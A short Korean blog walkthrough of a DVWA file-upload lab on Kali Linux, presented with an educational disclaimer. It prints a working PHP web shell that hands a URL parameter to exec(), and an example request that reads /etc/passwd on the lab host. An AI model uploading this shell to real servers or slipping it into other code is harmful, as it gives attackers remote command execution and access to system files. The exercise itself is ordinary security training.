삽질블로그
[Kali_LINUX] File Upload | DVWA | Website Hacking Attacks 본문
※ 본 내용은 교육 과정에서 필요한 실습 목적으로 구성된 것이며, 혹시라도 개인적인 용도 및 악의적인 목적으로 사용할 경우, 법적 책임은 본인에게 있다는 것을 알려드립니다.
파일 업로드 취약점 공격
1단계 : 외부 요청 명령을 받아 들일 수 있도록 실행파일을 작성합니다.
----hack.php----
<?php
$file = $_GET[ 'page' ];
exec($file, $output);
echo '$output:';
print_r($file);
echo '<br>';
print_r($output);
?>
----------------
PHP에서 $_GET 변수는 외부 HTML 폼 요청을 받을 수 있는 변수이다.
2단계 : 생성한 파일을 업로드 합니다.
3단계 : 업로드하였다면 아래 문구가 뜹니다.
../../hackable/uploads/hack.php succesfully uploaded !
4단계 : 해당 url을 입력해줍니다.
http://192.168.222.131/dvwa/hackable/uploads/hack.php?page=cat /etc/passwd
5단계 : 이렇게 떴다면 클리어
Comments